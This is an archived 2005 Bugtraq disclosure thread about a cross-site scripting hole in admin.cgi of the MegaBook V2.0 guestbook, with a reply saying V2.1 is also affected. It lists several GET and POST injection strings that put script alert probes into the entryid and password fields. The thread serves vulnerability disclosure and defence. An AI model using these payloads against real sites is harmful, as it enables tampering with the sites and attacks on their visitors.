Bugtraq mailing list archives
Re: MegaBook V2.0 - Cross Site Scripting Exploit
From: Spy Hat <spyhat () spyhat com>
Date: 8 May 2005 12:06:01 -0000
In-Reply-To: <20050505104551.23441.qmail () www securityfocus com> The same vulnerability also exist in the new version of MegaBook V2.1
Received: (qmail 6270 invoked from network); 5 May 2005 17:31:03 -0000 Received: from outgoing.securityfocus.com (HELO outgoing3.securityfocus.com) (205.206.231.27) by mail.securityfocus.com with SMTP; 5 May 2005 17:31:03 -0000 Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20]) by outgoing3.securityfocus.com (Postfix) with QMQP id 8A54C237664; Thu, 5 May 2005 09:22:24 -0600 (MDT) Mailing-List: contact bugtraq-help () securityfocus com; run by ezmlm Precedence: bulk List-Id: <bugtraq.list-id.securityfocus.com> List-Post: <mailto:bugtraq () securityfocus com> List-Help: <mailto:bugtraq-help () securityfocus com> List-Unsubscribe: <mailto:bugtraq-unsubscribe () securityfocus com> List-Subscribe: <mailto:bugtraq-subscribe () securityfocus com> Delivered-To: mailing list bugtraq () securityfocus com Delivered-To: moderator for bugtraq () securityfocus com Received: (qmail 20731 invoked from network); 5 May 2005 03:18:37 -0000 Date: 5 May 2005 10:45:51 -0000 Message-ID: <20050505104551.23441.qmail () www securityfocus com> Content-Type: text/plain Content-Disposition: inline Content-Transfer-Encoding: binary MIME-Version: 1.0 X-Mailer: MIME-tools 5.411 (Entity 5.404) From: Spy Hat <spyhat () spyhat com> To: bugtraq () securityfocus com Subject: MegaBook V2.0 - Cross Site Scripting Exploit The ultimate CGI Guestbook Scripts MegaBook V2.0 appears vulnerable to Cross Site Scripting, which will allow the attacker to modify the post in the guestbook. The affected scripts is admin.cgi URL: (http://www.(yourdomain).com/(yourcgidir)/admin.cgi) I have tested the script with the following query: ?action=modifypost&entryid="><script>alert('wvs-xss-magic-string-703410097');</script> I have also tested the script with theses POST variables: action=modifypost&entryid=66&password=<script>alert('wvs-xss-magic-string-188784308');</script> action=modifypost&entryid=66&password='><script>alert('wvs-xss-magic-string-486624156');</script> action=modifypost&entryid=66&password="><script>alert('wvs-xss-magic-string-1852691616');</script> action=modifypost&entryid=66&password=><script>alert('wvs-xss-magic-string-429380114');</script> action=modifypost&entryid=66&password=</textarea><script>alert('wvs-xss-magic-string-723975367');</script> Yours, SpyHat
Current thread:
- MegaBook V2.0 - Cross Site Scripting Exploit Spy Hat (May 05)
- <Possible follow-ups>
- Re: MegaBook V2.0 - Cross Site Scripting Exploit Morning Wood (May 06)
- Re: MegaBook V2.0 - Cross Site Scripting Exploit Spy Hat (May 09)